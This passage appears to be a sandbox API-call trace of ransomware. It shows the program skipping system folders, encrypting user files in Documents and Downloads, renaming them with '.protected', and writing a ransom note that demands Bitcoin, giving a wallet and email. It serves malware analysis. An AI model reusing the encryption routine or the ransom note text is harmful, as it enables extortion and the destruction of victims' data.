HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.642] StrStrW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".zip") returned 0x0 [0091.642] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.643] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.643] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.643] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.643] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.643] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.643] CloseHandle (hObject=0xb4) returned 1 [0091.644] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx.protected") returned 76 [0091.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yiizhveyce2tieuqq.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yiizhveyce2tieuqq.pptx.protected")) returned 1 [0091.644] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.644] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="Windows") returned 1 [0091.644] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="Program Files") returned 1 [0091.645] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="Program Files (x86)") returned 1 [0091.645] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="$Recycle.bin") returned 1 [0091.645] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="System Volume Information") returned 1 [0091.645] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrIW (lpFirst="Zn0 I.pptx", lpSrch=".protected") returned 0x0 [0091.645] lstrcmpW (lpString1="Zn0 I.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.645] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.645] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zn0 i.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrW (lpFirst="Zn0 I.pptx", lpSrch=".txt") returned 0x0 [0091.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrW (lpFirst="Zn0 I.pptx", lpSrch=".rar") returned 0x0 [0091.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrW (lpFirst="Zn0 I.pptx", lpSrch=".zip") returned 0x0 [0091.645] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.646] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.646] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.646] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.646] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 
lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.646] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.646] CloseHandle (hObject=0xb4) returned 1 [0091.647] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx.protected") returned 64 [0091.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zn0 i.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zn0 i.pptx.protected")) returned 1 [0091.648] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="Windows") returned -1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="Program Files") returned -1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="Program Files (x86)") returned -1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="$Recycle.bin") returned 1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="System Volume Information") returned -1 [0091.648] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.648] StrStrIW (lpFirst="_WuxhMS.pptx", lpSrch=".protected") returned 0x0 [0091.648] lstrcmpW (lpString1="_WuxhMS.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.648] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.648] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_wuxhms.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.649] StrStrW (lpFirst="_WuxhMS.pptx", lpSrch=".txt") returned 0x0 [0091.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.649] StrStrW (lpFirst="_WuxhMS.pptx", lpSrch=".rar") returned 0x0 [0091.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.649] StrStrW (lpFirst="_WuxhMS.pptx", lpSrch=".zip") returned 0x0 [0091.649] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.650] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.650] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.650] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.650] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 
[0091.650] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.650] CloseHandle (hObject=0xb4) returned 1 [0091.650] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx.protected") returned 66 [0091.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_wuxhms.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_wuxhms.pptx.protected")) returned 1 [0091.651] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.651] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.651] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RESTORE_FILES.txt") returned 61 [0091.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.665] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.665] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.666] lstrlenA (lpString="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") returned 684 [0091.666] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.666] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.667] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.667] CloseHandle (hObject=0xa4) returned 1 [0091.667] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="Windows") returned -1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="Program Files") returned -1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="Program Files (x86)") returned -1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="$Recycle.bin") returned 1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="System Volume Information") returned -1 [0091.667] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned 43 [0091.667] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0091.667] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0091.667] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned 45 [0091.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.667] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.668] 
lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.668] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.") returned 45 [0091.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.668] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.668] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.668] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.668] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.671] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.671] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.671] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.671] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.671] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.671] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.671] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\..") returned 46 [0091.671] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.671] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.671] lstrcmpW (lpString1="..", 
lpString2="RESTORE_FILES.txt") returned -1 [0091.671] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.671] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.671] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.671] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.671] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.671] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.671] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.671] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.672] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.672] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.672] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.672] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.672] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.672] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.672] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.673] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.673] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.673] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.673] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.674] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 
[0091.674] CloseHandle (hObject=0xb4) returned 1 [0091.674] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.protected") returned 65 [0091.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.protected")) returned 1 [0091.675] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.675] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.675] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\RESTORE_FILES.txt") returned 61 [0091.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.692] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.692] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.692] lstrlenA (lpString="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") returned 684 [0091.693] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.693] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.693] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.693] CloseHandle (hObject=0xa4) returned 1 [0091.693] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 [0091.693] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned 43 [0091.693] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0091.693] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0091.693] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 45 [0091.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.697] lstrcmpiW (lpString1=".", 